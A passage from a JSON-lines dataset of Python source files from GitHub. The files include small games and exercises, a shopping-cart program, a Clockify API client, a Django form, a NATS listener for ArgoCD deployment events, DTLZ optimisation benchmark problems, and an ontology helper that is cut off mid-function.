return True\n\n #[408, 474], [408, 304]\n if ((408-5) <= arr[0] <= (408+5)) and (304 <= arr[1] <= 474):\n return True\n\n #[682, 474], [682, 304]\n if ((682-5) <= arr[0] <= (682+5)) and (304 <= arr[1] <= 474):\n return True\n #[281, 69], [281, 231]\n if ((281-5) <= arr[0] <= (281+5)) and (69 <= arr[1] <= 231):\n return True\n\n #[541, 69], [541, 231]\n if ((541-5) <= arr[0] <= (541+5)) and (69 <= arr[1] <= 231):\n return True\n return False\n\nif __name__ == \"__main__\":\n arr = [59,268]\n img = getDisplay(arr)\n key = 100\n\n while True:\n done = False\n cv.imshow(\"The Bird Dot game\", img)\n #key = cv.waitKey(0)\n if key == ord('a'):\n arr[0] = arr[0] - 5\n elif key == ord('d'):\n arr[0] = arr[0] + 5\n elif key == ord('w'):\n arr[1] = arr[1] - 5\n elif key == ord('s'):\n arr[1] = arr[1] + 5\n elif key == ord('e'):\n arr[0] = arr[0] + 5\n arr[1] = arr[1] - 5\n elif key == ord('z'):\n arr[0] = arr[0] + 5\n arr[1] = arr[1] + 5\n elif key == ord('q'):\n break\n\n if dtCollisionBoundaries(arr) == True:\n print(\"Collided\")\n break\n if dtDestination(arr) == True:\n print(\"Reached destination\")\n break\n if collisionWithHind(arr) == True:\n print(\"Collided with hinderance\")\n break\n img = getDisplay(arr)\n k = cv.waitKey(400)\n if k != -1:\n key = copy.deepcopy(k)","repo_name":"ajithvallabai/RL001","sub_path":"Lesson_01_DotsAndLines/basic_games/bird.py","file_name":"bird.py","file_ext":"py","file_size_in_byte":3984,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"43771049851","text":"import sys\nitem_list = list()\nitem_price = list()\nitem_quantity = list()\namount_list = list()\ncounter_list = list()\nmanage_cart = True\naddin_item_dashboard = True\ntotal = 0\nposition = 0\ntotal_amount = 0\n\nprint('Welcome to the Shopping Cart Program!')\nprint('')\nwhile manage_cart == True:\n\n print(\"\"\"Please select one of the following:\n 1. Add item\n 2. View cart\n 3. Modify cart quantities\n 4. Compute total\n 5. Remove item\n 6. Clear Cart\n 7. Quit\"\"\")\n\n enter_action = int(input('Please enter an action: '))\n if enter_action == 1:\n while addin_item_dashboard == True:\n \n item = str(input('Enter item to add: '))\n if item.capitalize() in item_list:\n print('The item is already in the cart')\n addin_item_dashboard = True\n break\n else:\n item_list.append(item.capitalize())\n\n price = float(input('Enter item price: '))\n item_price.append(price)\n add_quantity = float(input('Enter item quantity: '))\n item_quantity.append(add_quantity)\n amount = price*add_quantity\n amount_list.append(amount)\n print()\n print(f'* {item.capitalize()} * has been added to the cart')\n\n continue_adding_items = input('Do you want to continue adding items to the cart? [YES or NO]: ')\n\n if continue_adding_items == 'yes':\n addin_item_dashboard = True\n else:\n addin_item_dashboard = False\n break\n \n elif enter_action == 2:\n print('The contents of the shopping cart are:')\n print(\"+------------+--------------------+------------+-------------+-----------+\")\n print(\"|ITEM NUMBER |ITEM |QTY. |PRICE |AMOUNT |\")\n print(\"+------------+--------------------+------------+-------------------------+\")\n counter = 1 \n for a, b, c, d in zip (item_list, item_quantity, item_price, amount_list):\n \n print(\"| {:10}|{:<20}|{:>12.2f}|${:>12.2f}|${:>10.2f}|\".format(counter, a, b, c, d))\n counter += 1\n \n \n print(\"+------------+--------------------+------------+-------------------------+\")\n \n total = 0\n total_amount = 0\n\n for amount in amount_list:\n total += amount\n total_amount += 1\n \n print(\"|------------|--------------------|------------|TOTAL: |${:>10.2f}|\".format(total))\n print(\"+------------+--------------------+------------+-------------------------+\")\n\n elif enter_action == 3:\n \n index = int(input(\"What quantity index do you want to update? \"))\n new_qty = int(input(\"What is the new quantity? \"))\n\n item_quantity[index] = new_qty\n if new_qty >= 0:\n amount_list[index] = item_price[index]*new_qty\n\n total = 0\n total_amount = 0\n\n for amount in amount_list:\n total += amount\n total_amount += 1\n\n print('\\nQuantity updated successfully!')\n \n ##############################################################################\n # New Quantity purchase\n ##############################################################################\n\n print('\\nThe new contents of the shopping cart are:')\n print(\"+------------+--------------------+------------+-------------+-----------+\")\n print(\"|ITEM NUMBER |ITEM |QTY. |PRICE |AMOUNT |\")\n print(\"+------------+--------------------+------------+-------------------------+\")\n counter = 1 \n for a, b, c, d in zip (item_list, item_quantity, item_price, amount_list):\n \n print(\"| {:10}|{:<20}|{:>12.2f}|${:>12.2f}|${:>10.2f}|\".format(counter, a, b, c, d))\n counter += 1\n \n \n print(\"+------------+--------------------+------------+-------------------------+\")\n print(\"|------------|--------------------|------------|TOTAL: |${:>10.2f}|\".format(total))\n print(\"+------------+--------------------+------------+-------------------------+\")\n \n ################################################################################ \n \n elif enter_action == 4:\n\n total = 0\n total_amount = 0\n\n for amount in amount_list:\n total += amount\n total_amount += 1\n \n print(f'The total price of the items in the shopping cart is ${total:.2f}')\n print()\n\n elif enter_action == 5:\n delete_item = input('Enter the number of the item to delete: ')\n print()\n if delete_item.isdigit() and int(delete_item) <= counter:\n position = int(delete_item) - 1\n del item_list[position]\n del item_price[position]\n del item_quantity[position]\n del amount_list[position]\n \n print(f'* {delete_item} * deleted successfully')\n else:\n print('The article does not exist')\n print()\n\n elif enter_action == 6:\n delete_all = input('Are you sure you want to remove all items from the cart? [YES or NO]: ')\n delete_all = delete_all.lower()\n\n if delete_all == 'yes':\n item_list = []\n item_quantity = []\n item_price = []\n amount_list = []\n \n manage_cart == True\n \n elif enter_action == 7:\n user_exit = input('Are you sure you want to exit the cart? [YES or NO]: ')\n user_exit = user_exit.lower()\n if user_exit == 'yes':\n sys.exit('Thank you. Goodbye.')\n else:\n manage_cart = True\n \n else:\n print('Invalid input error, please enter a number between 1 and 7')\n print()\n manage_cart == True","repo_name":"FernandoDCardozoBraga/CSE110","sub_path":"w10/w10_prove_assignment.py","file_name":"w10_prove_assignment.py","file_ext":"py","file_size_in_byte":5921,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"71914452712","text":"import logging\n\nfrom clockify_api_client.abstract_clockify import AbstractClockify\n\n\nclass Report(AbstractClockify):\n def __init__(self, api_key, api_url):\n super(Report, self).__init__(api_key=api_key, api_url=api_url)\n self.base_url = f'https://reports.{api_url}'.strip('/')\n\n def get_summary_report(self, workspace_id, payload):\n \"\"\"Calls Clockify API for summary report. Returns summary report object(Dictionary)\n :param workspace_id Id of workspace for report.\n :param payload Body of request for summary report.\n :return Dictionary with summary report.\n \"\"\"\n try:\n url = self.base_url + '/workspaces/' + workspace_id + '/reports/summary/'\n return self.post(url, payload)\n except Exception as e:\n logging.error(\"API error: {0}\".format(e))\n raise e\n\n def get_detailed_report(self, workspace_id, payload):\n \"\"\"Calls Clockify API for detailed report. Returns detailed report object(Dictionary)\n :param workspace_id Id of workspace for report.\n :param payload Body of request for detailed report.\n :return Dictionary with detailed report.\n \"\"\"\n try:\n url = self.base_url + '/workspaces/' + workspace_id + '/reports/detailed/'\n return self.post(url, payload)\n except Exception as e:\n logging.error(\"API error: {0}\".format(e))\n raise e\n\n def get_weekly_report(self, workspace_id, payload):\n \"\"\"Calls Clockify API for weekly report. Returns weekly report object(Dictionary)\n :param workspace_id Id of workspace for report.\n :param payload Body of request for weekly report.\n :return Dictionary with weekly report.\n \"\"\"\n try:\n url = self.base_url + '/workspaces/' + workspace_id + '/reports/weekly/'\n return self.post(url, payload)\n except Exception as e:\n logging.error(\"API error: {0}\".format(e))\n raise e\n","repo_name":"group-eluvia-com/clockify-api-client","sub_path":"clockify_api_client/models/report.py","file_name":"report.py","file_ext":"py","file_size_in_byte":2061,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"72"} +{"seq_id":"28342312570","text":"from django import forms\n\nfrom accounts.models import User\n\n\nclass AccountUpdateForm(forms.ModelForm):\n class Meta:\n model = User\n fields = [\n \"email\",\n \"phone\",\n \"bio\",\n \"first_name\",\n \"last_name\",\n ]\n\n def clean_email(self):\n email = self.cleaned_data[\"email\"].lower()\n try:\n user = User.objects.exclude(username=self.instance.username).get(\n email=email\n )\n except User.DoesNotExist:\n return email\n raise forms.ValidationError('Email \"%s\" is already in use.' % email)\n\n def save(self, commit=True):\n profile = super(AccountUpdateForm, self).save(commit=False)\n profile.email = self.cleaned_data[\"email\"].lower()\n profile.phone = self.cleaned_data[\"phone\"]\n profile.bio = self.cleaned_data[\"bio\"]\n profile.first_name = self.cleaned_data[\"first_name\"]\n profile.last_name = self.cleaned_data[\"last_name\"]\n if commit:\n profile.save()\n return profile\n","repo_name":"Masoudvahid/SocialNetworkingSite","sub_path":"profiles/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1077,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"26506288035","text":"mystring = 'Hello'\nmylist = []\n\n#1 way\n# for letter in mystring:\n# mylist.append(letter)\n# print(letter)\n\n#2 way\n\n#This way below puts each letter into an index in the list\nmylist = [letter for letter in mystring]\nprint(mylist)\n\n#This below puts a number into an index for as many numbers in the list, mylist2\nmylist2 = [num for num in range(0,10)]\nprint(mylist2)\n\n#This belows puts only even numbers in an index for as many numbers in the num_list list\nnum_list = [num for num in range(0,10) if num % 2 == 0]\nprint(num_list)\n\n#tempertature conversion from celsius into fahrenheit\n\ncelsius = [0, 10, 20, 34.5]\n\nfahrenheit = [( (9/5)*temp + 32) for temp in celsius]\n\nprint(fahrenheit)","repo_name":"rbdjur/Python","sub_path":"Practice_Modules/Python_Statements/list_comprehension.py","file_name":"list_comprehension.py","file_ext":"py","file_size_in_byte":691,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"31600637114","text":"# number guessing game\r\n\r\nimport random\r\n\r\nuser_input_number = input(\"Upto where do you do you want to guess: \")\r\n\r\nif user_input_number.isdigit():\r\n user_input_number = int(user_input_number)\r\nelse:\r\n print(\"Please enter a number next time\")\r\n quit()\r\n\r\n\r\nrandom_number = random.randint(0, user_input_number)\r\nguesses = 0\r\n\r\n\r\nwhile True:\r\n guesses += 1\r\n user_guess = input(\"make a guess > \")\r\n if user_guess.isdigit():\r\n user_guess = int(user_guess)\r\n else:\r\n print(\"Please type a number next time\")\r\n continue\r\n\r\n if user_guess == random_number:\r\n print(\"Congraulation! you got it right\")\r\n break\r\n elif user_guess > random_number:\r\n print(\"You're guessing too high\")\r\n else:\r\n print(\"You're guessing too low\")\r\n\r\nprint(f\"You got the right answer in {guesses} guesses\")\r\n","repo_name":"SahilGoyal9598/beginner-projects","sub_path":"number_guesser.py","file_name":"number_guesser.py","file_ext":"py","file_size_in_byte":854,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"5757844596","text":"import sys\nimport argparse\nimport json\nimport base64\nimport asyncio\nimport nats\nimport stan\nimport os\nimport time\nfrom nats.errors import ConnectionClosedError, TimeoutError, NoServersError\nfrom nats.aio.client import Client as NATS\nfrom stan.aio.client import Client as STAN\nfrom kubernetes import client, config\nfrom kubernetes.client.rest import ApiException\nimport urllib3\nurllib3.disable_warnings()\n\nparser = argparse.ArgumentParser()\nparser.add_argument('-p', '--project', help='argocd project name', required=True)\nparser.add_argument('-a', '--application', help='argocd application name', required=True)\nparser.add_argument('-c', '--commit', help='commit SHA', required=True)\nparser.add_argument('-t', '--timeout', help='maximum time to wait in seconds', required=True)\nparser.add_argument('-n', '--namespace', help='namespace containing eventbus', required=True)\nparser.add_argument('-e', '--eventbus', help='eventbus name', required=False)\nparser.add_argument('-k', '--kubeconfig', help='the path to kubeconfig', required=False)\nparser.add_argument('-r', '--resultpath', help='the path to task result', required=True)\nargs = parser.parse_args()\n\neventbus = args.eventbus\nif not eventbus:\n eventbus = \"default\"\nns = args.namespace\ntimeout = int(args.timeout)\nproject_name = args.project\napp_name = args.application\ncommit = args.commit\nresult_path = args.resultpath\nstep = 2\nexit_code = -1\n\nasync def main():\n nc = NATS()\n options = get_nats_connection_options()\n await nc.connect(**options)\n\n sc = STAN()\n cluster_id = \"eventbus-\" + eventbus\n client_id = \"client-\" + str(int(time.time()))\n print(\"connect to {} by {}\".format(cluster_id, client_id))\n await sc.connect(cluster_id, client_id, nats=nc)\n\n async def message_handler(msg):\n eventJson = msg.data.decode('utf-8')\n event = json.loads(eventJson)\n if event['type'] != \"webhook\" or event['subject'] != \"deployments-status\":\n print(\"received a invalid message, type: {}, subject: {}\".format(event['type'], event['subject']))\n return\n\n dataJson = base64.b64decode(event['data_base64'])\n data = json.loads(dataJson)\n body = data['body']\n\n if body['project'] == project_name and body['application'] == app_name and body['revision'] == commit:\n print(\"received a valid message, data:\")\n print(data)\n global exit_code\n phase = body['phase']\n sync_status = body['sync_status']\n healthy = body['healthy']\n url = body['url']\n if phase == \"Succeeded\" and healthy == \"Healthy\":\n with open(result_path, mode='w', encoding='utf-8') as result:\n result.write(url)\n exit_code = 0\n elif phase == \"Failed\" or phase == \"Error\":\n exit_code = 1\n else: \n print(\"deployment in progressing..., phase:{}, sync_status:{}, healthy:{}\".format(phase, sync_status, healthy))\n else:\n print(\"received a invalid message, project: {}, application: {}, revision: {}\".format(body['project'], body['application'], body['revision']))\n\n async def error_handler(error):\n print(\"error: \" + error)\n global exit_code\n exit_code = 1\n\n subject = \"eventbus-\" + ns\n sub = await sc.subscribe(subject = subject, cb = message_handler, start_at = 0, error_cb = error_handler)\n print(\"Listening for '{}/{}' ...\".format(project_name, app_name))\n\n count = int(timeout/step)\n for i in range(1, count):\n await asyncio.sleep(step)\n if exit_code >= 0:\n await exit(sub, nc, exit_code)\n print(\"timeout and exit: \" + str(timeout) + \"s\")\n await exit(sub, nc, 1)\n\nasync def exit(sub, nc, exit_code):\n await sub.unsubscribe()\n await nc.drain()\n sys.exit(exit_code)\n\ndef get_nats_connection_options():\n if args.kubeconfig:\n config.load_kube_config(config_file=args.kubeconfig)\n else:\n config.load_incluster_config()\n v1api = client.CoreV1Api()\n custom_object_api = client.CustomObjectsApi()\n\n eventbus_pods = v1api.list_namespaced_pod(namespace=ns, label_selector=\"eventbus-name=\" + eventbus)\n servers = []\n for eventbus_pod in eventbus_pods.items:\n pod_ip = eventbus_pod.status.pod_ip\n servers.append(\"nats://{}:4222\".format(pod_ip))\n\n secret_name = \"eventbus-\" + eventbus + \"-client\"\n eventbus_client_secret = v1api.read_namespaced_secret(name=secret_name, namespace=ns)\n token_kv_base64 = eventbus_client_secret.data['client-auth']\n token_kv = base64.b64decode(token_kv_base64)\n token = token_kv.split(b':')[1].replace(b\"\\\"\", b\"\").decode('utf-8').strip()\n options = {\"servers\": servers, \"token\": token}\n return options\n\n\nif __name__ == '__main__':\n asyncio.run(main())\n","repo_name":"nautes-labs/demo-bot","sub_path":"nautes-listener.py","file_name":"nautes-listener.py","file_ext":"py","file_size_in_byte":4831,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"36415946848","text":"#!/usr/bin/python3\n\"\"\"A module with definition of a class `Square`\"\"\"\n\n\nclass Square:\n \"\"\"A class that defines a square by private, public instance attribute\n \"\"\"\n\n def __init__(self, size=0, position=(0, 0)):\n \"\"\"Initializes the intance attribute and raises exception if error\n\n Args:\n size (int): Size of the square\n position (tuple): A tuple of two positive number for x and y axis\n \"\"\"\n Square.check_size(size)\n self.__size = size\n\n Square.check_pos(position)\n self.__position = position\n\n @property\n def size(self):\n \"\"\":obj:`int`: Current size of the square\n\n The setter method raises an exception if the value is not int or < 0\n \"\"\"\n return self.__size\n\n @size.setter\n def size(self, value):\n Square.check_size(value)\n self.__size = value\n\n def area(self):\n \"\"\"Method that returns the current area of the square\"\"\"\n return self.__size ** 2\n\n @property\n def position(self):\n \"\"\":obj:`tuple` of :obj:`int`: index 0 sets spaces and 1 sets newline\n\n The setter method raises an exception of ValueError or TypeError\n \"\"\"\n return self.__position\n\n @position.setter\n def position(self, value):\n Square.check_pos(value)\n self.__position = value\n\n def my_print(self):\n \"\"\"Prints the square using `#` signs\"\"\"\n if self.__size == 0:\n print()\n else:\n for i in range(self.__position[1]):\n print()\n for i in range(self.__size):\n print(\" \" * self.__position[0] + \"#\" * self.__size)\n\n def __str__(self):\n \"\"\"Returns the square made using `#` signs\"\"\"\n\n sq_str = \"\"\n if self.__size == 0:\n return sq_str\n else:\n x, y = self.__position\n\n for _ in range(y):\n sq_str = sq_str + \"\\n\"\n\n for _ in range(self.__size):\n if x:\n sq_str = sq_str + (' ' * x)\n sq_str += ('#' * self.__size) + '\\n'\n sq_str = sq_str[:-1]\n return sq_str\n\n @staticmethod\n def check_size(size):\n \"\"\"Checks if the size passed to class Square is valid\n\n Args:\n size (int): The size of the square at a given instance\n \"\"\"\n\n if type(size) != int:\n raise TypeError(\"size must be an integer\")\n if size < 0:\n raise ValueError(\"size must be >= 0\")\n\n @staticmethod\n def check_pos(position):\n \"\"\"Checks if the position passed to class Square is valid\n\n Args:\n position: The position at which the square should be printed\n \"\"\"\n\n if type(position) != tuple or len(position) != 2 \\\n or type(position[0]) != int or type(position[1]) != int \\\n or position[0] < 0 or position[1] < 0:\n raise TypeError(\"position must be a tuple of 2 positive integers\")\n","repo_name":"chee-zaram/alx-higher_level_programming","sub_path":"0x06-python-classes/101-square.py","file_name":"101-square.py","file_ext":"py","file_size_in_byte":3000,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"73826050152","text":"import autograd.numpy as anp\n\nfrom pymop.problem import Problem\nimport numpy as np\n\n\nclass DTLZ(Problem):\n def __init__(self, n_var, n_obj, k=None):\n\n if n_var:\n self.k = n_var - n_obj + 1\n elif k:\n self.k = k\n n_var = k + n_obj - 1\n else:\n raise Exception(\"Either provide number of variables or k!\")\n\n super().__init__(n_var=n_var, n_obj=n_obj, n_constr=0, xl=0, xu=1, type_var=anp.double)\n\n def g1(self, X_M):\n return 1 * (self.k + anp.sum(anp.square(X_M - 0.5) - anp.cos(2 * anp.pi * (X_M - 0.5)), axis=1))\n\n def g2(self, X_M):\n return anp.sum(anp.square(X_M - 0.5), axis=1)\n\n def obj_func(self, X_, g, alpha=1):\n f = []\n\n for i in range(0, self.n_obj):\n _f = (1 + g)\n _f *= anp.prod(anp.cos(anp.power(X_[:, :X_.shape[1] - i], alpha) * anp.pi / 2.0), axis=1)\n if i > 0:\n _f *= anp.sin(anp.power(X_[:, X_.shape[1] - i], alpha) * anp.pi / 2.0)\n\n f.append(_f)\n\n f = anp.column_stack(f)\n return f\n\n\ndef generic_sphere(ref_dirs):\n return ref_dirs / anp.tile(anp.linalg.norm(ref_dirs, axis=1)[:, None], (1, ref_dirs.shape[1]))\n\n\nclass DTLZ1(DTLZ):\n def __init__(self, n_var=7, n_obj=3, **kwargs):\n super().__init__(n_var, n_obj, **kwargs)\n\n def _calc_pareto_front(self, ref_dirs=None):\n return 0.5 * ref_dirs\n\n def _evaluate(self, x, out, *args, **kwargs):\n X_, X_M = x[:, :self.n_obj - 1], x[:, self.n_obj - 1:]\n g = self.g1(X_M)\n\n f = []\n for i in range(0, self.n_obj):\n _f = 0.5 * (1 + g)\n _f *= anp.prod(X_[:, :X_.shape[1] - i], axis=1)\n if i > 0:\n _f *= 1 - X_[:, X_.shape[1] - i]\n f.append(_f)\n\n out[\"F\"] = anp.column_stack(f)\n\n\nclass DTLZ2(DTLZ):\n def __init__(self, n_var=10, n_obj=3, **kwargs):\n super().__init__(n_var, n_obj, **kwargs)\n\n def _calc_pareto_front(self, ref_dirs):\n return generic_sphere(ref_dirs)\n\n def _evaluate(self, x, out, *args, **kwargs):\n X_, X_M = x[:, :self.n_obj - 1], x[:, self.n_obj - 1:]\n g = self.g2(X_M)\n out[\"F\"] = self.obj_func(X_, g, alpha=1)\n\n\nclass DTLZ3(DTLZ):\n def __init__(self, n_var=10, n_obj=3, **kwargs):\n super().__init__(n_var, n_obj, **kwargs)\n\n def _calc_pareto_front(self, ref_dirs):\n return generic_sphere(ref_dirs)\n\n def _evaluate(self, x, out, *args, **kwargs):\n X_, X_M = x[:, :self.n_obj - 1], x[:, self.n_obj - 1:]\n g = self.g1(X_M)\n out[\"F\"] = self.obj_func(X_, g, alpha=1)\n\n\nclass DTLZ4(DTLZ):\n def __init__(self, n_var=10, n_obj=3, alpha=100, d=100, **kwargs):\n super().__init__(n_var, n_obj, **kwargs)\n self.alpha = alpha\n self.d = d\n\n def _calc_pareto_front(self, ref_dirs):\n return generic_sphere(ref_dirs)\n\n def _evaluate(self, x, out, *args, **kwargs):\n X_, X_M = x[:, :self.n_obj - 1], x[:, self.n_obj - 1:]\n g = self.g2(X_M)\n out[\"F\"] = self.obj_func(X_, g, alpha=self.alpha)\n\n\nclass DTLZ5(DTLZ):\n def __init__(self, n_var=10, n_obj=3, **kwargs):\n super().__init__(n_var, n_obj, **kwargs)\n\n def _calc_pareto_front(self, n_pareto_points=100):\n # raise Exception(\"Not implemented yet.\")\n p1 = np.atleast_2d(np.arange(0, 1 + 1/n_pareto_points, 1/(n_pareto_points-1))).reshape(-1, 1)\n p2 = np.atleast_2d(np.arange(1, 0-1/n_pareto_points, -1/(n_pareto_points-1))).reshape(-1, 1)\n p = np.hstack((p1, p2))\n p3 = np.atleast_2d(np.sqrt(np.sum(p**2, axis=1))).reshape(-1, 1)\n p3 = np.repeat(p3, p.shape[1], axis=1)\n p = p/p3\n # p = np.hstack((p[:, ]))\n a = 0\n if self.n_obj - 2 > 0:\n select_columes = list(map(int, np.zeros(self.n_obj-2)))\n p = np.hstack((p[:, select_columes], p))\n n_p = len(p) ## number of rows\n p4 = [self.n_obj-2]\n p4 = np.append(p4, np.arange(self.n_obj - 2, -0.01, -1))\n p4 = np.repeat(np.atleast_2d(p4), n_p, axis=0)\n p = p/np.sqrt(2)**p4\n return p\n\n\n\n\n def _evaluate(self, x, out, *args, **kwargs):\n X_, X_M = x[:, :self.n_obj - 1], x[:, self.n_obj - 1:]\n g = self.g2(X_M)\n\n theta = 1 / (2 * (1 + g[:, None])) * (1 + 2 * g[:, None] * X_)\n theta = anp.column_stack([x[:, 0], theta[:, 1:]])\n\n out[\"F\"] = self.obj_func(theta, g)\n\n\nclass DTLZ6(DTLZ):\n def __init__(self, n_var=10, n_obj=3, **kwargs):\n super().__init__(n_var, n_obj, **kwargs)\n\n def _calc_pareto_front(self):\n raise Exception(\"Not implemented yet.\")\n\n def _evaluate(self, x, out, *args, **kwargs):\n X_, X_M = x[:, :self.n_obj - 1], x[:, self.n_obj - 1:]\n g = anp.sum(anp.power(X_M, 0.1), axis=1)\n\n theta = 1 / (2 * (1 + g[:, None])) * (1 + 2 * g[:, None] * X_)\n theta = anp.column_stack([x[:, 0], theta[:, 1:]])\n\n out[\"F\"] = self.obj_func(theta, g)\n\n\nclass DTLZ7(DTLZ):\n def __init__(self, n_var=10, n_obj=3, **kwargs):\n super().__init__(n_var, n_obj, **kwargs)\n\n def _calc_pareto_front(self, n_pareto_points=100):\n interval = [0, 0.251412, 0.631627, 0.859401]\n median = (interval[1]-interval[0])/(interval[3]-interval[2]+interval[1]-interval[0])\n X = self._replicatepoint(n_pareto_points, self.n_obj-1)\n X[X <= median] = X[X <= median]*(interval[1]-interval[0])/median+interval[0]\n X[X > median] = (X[X > median] - median) * (interval[3]-interval[2])/(1-median)+interval[2]\n p2 = 2 * (self.n_obj - np.sum(X/2 * (1 + np.sin(3 * np.pi * X)), axis=1))\n p2 = np.atleast_2d(p2).reshape(-1, 1)\n p = np.hstack((X, p2))\n return p\n\n\n\n def _replicatepoint(self, sample_num, M):\n if M > 1 and M < 3:\n sample_num = np.ceil(sample_num**(1/M))**M\n gap = np.arange(0, 1 + 1e-7, 1/(sample_num**(1/M)-1))\n c1, c2 = np.meshgrid(gap, gap, indexing='ij')\n W = np.hstack((np.atleast_2d(c1.flatten(order='F')).reshape(-1, 1),\n np.atleast_2d(c2.flatten(order='F')).reshape(-1, 1)))\n\n elif M == 1:\n W = np.arange(0, 1 + 1e-5, 1/(sample_num-1))\n W = np.atleast_2d(W).reshape(-1, 1)\n\n else:\n raise(\n \"for number objectives greater than 3, not implemented\"\n )\n return W\n\n\n\n\n def _evaluate(self, x, out, *args, **kwargs):\n f = []\n for i in range(0, self.n_obj - 1):\n f.append(x[:, i])\n f = anp.column_stack(f)\n\n g = 1 + 9 / self.k * anp.sum(x[:, -self.k:], axis=1)\n h = self.n_obj - anp.sum(f / (1 + g[:, None]) * (1 + anp.sin(3 * anp.pi * f)), axis=1)\n\n out[\"F\"] = anp.column_stack([f, (1 + g) * h])\n\n\nclass ScaledProblem(Problem):\n\n def __init__(self, problem, scale_factor):\n super().__init__(n_var=problem.n_var, n_obj=problem.n_obj, n_constr=problem.n_constr,\n xl=problem.xl, xu=problem.xu, type_var=problem.type_var)\n self.problem = problem\n self.scale_factor = scale_factor\n\n @staticmethod\n def get_scale(n, scale_factor):\n return anp.power(anp.full(n, scale_factor), anp.arange(n))\n\n def evaluate(self, X, *args, **kwargs):\n t = self.problem.evaluate(X, **kwargs)\n F = t[0] * ScaledProblem.get_scale(self.n_obj, self.scale_factor)\n return tuple([F] + list(t)[1:])\n\n def _calc_pareto_front(self, *args, **kwargs):\n return self.problem.pareto_front(*args, **kwargs) * ScaledProblem.get_scale(self.n_obj, self.scale_factor)\n\n\nclass ConvexProblem(Problem):\n\n def __init__(self, problem):\n super().__init__(problem.n_var, problem.n_obj, problem.n_constr, problem.xl, problem.xu)\n self.problem = problem\n\n @staticmethod\n def get_power(n):\n p = anp.full(n, 4.0)\n p[-1] = 2.0\n return p\n\n def evaluate(self, X, *args, **kwargs):\n t = self.problem.evaluate(X, **kwargs)\n F = anp.power(t[0], ConvexProblem.get_power(self.n_obj))\n return tuple([F] + list(t)[1:])\n\n def _calc_pareto_front(self, ref_dirs, *args, **kwargs):\n F = self.problem.pareto_front(ref_dirs)\n return anp.power(F, ConvexProblem.get_power(self.n_obj))\n\n\n\nif __name__ == \"__main__\":\n pro = DTLZ7(n_var=6, n_obj=2)\n print(pro.name())\n y = pro.pareto_front(n_pareto_points=40)\n print(y)\n\n # bj = pro.evaluate(x)\n # print(obj)","repo_name":"arielBWong/EGO","sub_path":"surrogate_problems/DTLZs.py","file_name":"DTLZs.py","file_ext":"py","file_size_in_byte":8511,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"73370613352","text":"import json\nimport os\nimport math\nimport pprint\nfrom owlready2 import *\n\nis_debug = False\n\n\ndef get_label(x):\n\tonto = None\n\tif is_debug:\n\t\tonto = get_ontology(\"E:\\\\Homework\\\\Intelligent Agents\\\\PartPicker\\\\Shared6.owl\").load()\n\telse:\n\t\tonto = get_ontology(\"Shared6.owl\").load()\n\tobo = get_namespace(\"http://webprotege.stanford.edu/project/xpUFBIdmzwyCPpbfIg4hh\")\n\t# sync_reasoner()\n\tis_str = isinstance(x, str)\n\n\tif x.name != None:\n\t\tif hasattr(x, '_label'):\n\t\t\treturn x._label[0]\n\t\telif hasattr(x, '_name'):\n\t\t\treturn x._name\n\telif is_str:\n\t\tif 'webprotege' in x:\n\t\t\tx = str(x)\n\t\t\t_id = x.split('.')[3]\n\t\t\treturn obo[_id].label[0]\n\t\telse: \n\t\t\treturn x.split('.')[1]\n\ndef get_classes():\n\tonto = None\n\tif is_debug:\n\t\tonto = get_ontology(\"E:\\\\Homework\\\\Intelligent Agents\\\\PartPicker\\\\Shared6.owl\").load()\n\telse:\n\t\tonto = get_ontology(\"Shared6.owl\").load()\n\tobo = get_namespace(\"http://webprotege.stanford.edu/project/xpUFBIdmzwyCPpbfIg4hh\")\n\tsync_reasoner()\n\n\tclasses = []\n\tfor x in list(onto.classes()):\n\t\tx = str(x)\n\t\tclass_name = \"\"\n\t\tif 'webprotege' in x:\n\t\t\tclass_name = get_label(x)\n\t\t### web version only\n\t\t# else: # ont1\n\t\t# \t_id = x.split('.')[1]\n\t\t# \tclass_name = _id\n\t\telse: \n\t\t\tclass_name = x.split('.')[1]\n\n\t\tclasses.append(class_name)\n\treturn classes\n\ndef get_subclasses_recur(class_id, is_IRIS = False):\n\tonto = None\n\tif is_debug:\n\t\tonto = get_ontology(\"E:\\\\Homework\\\\Intelligent Agents\\\\PartPicker\\\\Shared6.owl\").load()\n\telse:\n\t\tonto = get_ontology(\"Shared6.owl\").load()\n\tobo = get_namespace(\"http://webprotege.stanford.edu/project/xpUFBIdmzwyCPpbfIg4hh\")\n\t# sync_reasoner()\n\n\tsearch_subclasses = None\n\tif is_IRIS:\n\t\tsearch_subclasses = onto.search(subclass_of = IRIS[class_id]) # bleh finally got this POS to work\n\telse:\n\t\tsearch_subclasses = onto.search(subclass_of = obo[class_id])\n\n\tsubclasses = []\n\tfor x in search_subclasses:\n\t\tprint(x)\n\t\tsubclasses.append(get_label(x))\n\treturn subclasses\n\ndef get_subclasses_onelevel(class_id):\n\tonto = None\n\tif is_debug:\n\t\tonto = get_ontology(\"E:\\\\Homework\\\\Intelligent Agents\\\\PartPicker\\\\Shared6.owl\").load()\n\telse:\n\t\tonto = get_ontology(\"Shared6.owl\").load()\n\tobo = get_namespace(\"http://webprotege.stanford.edu/project/xpUFBIdmzwyCPpbfIg4hh\")\n\t# sync_reasoner()\n\n\tsubclasses = []\n\tsearch_subclasses = onto.search(subclass_of = obo[class_id]) \n\tfor x in search_subclasses:\n\t\t# search thru all parents\n\t\tfor parent in x.is_a:\n\t\t\tcur_parent = str(parent)\n\t\t\tif class_id in cur_parent: \n\t\t\t\tsubclasses.append(get_label(x))\n\treturn subclasses\n\ndef get_indivs(class_id):\n\tonto = None\n\tif is_debug:\n\t\tonto = 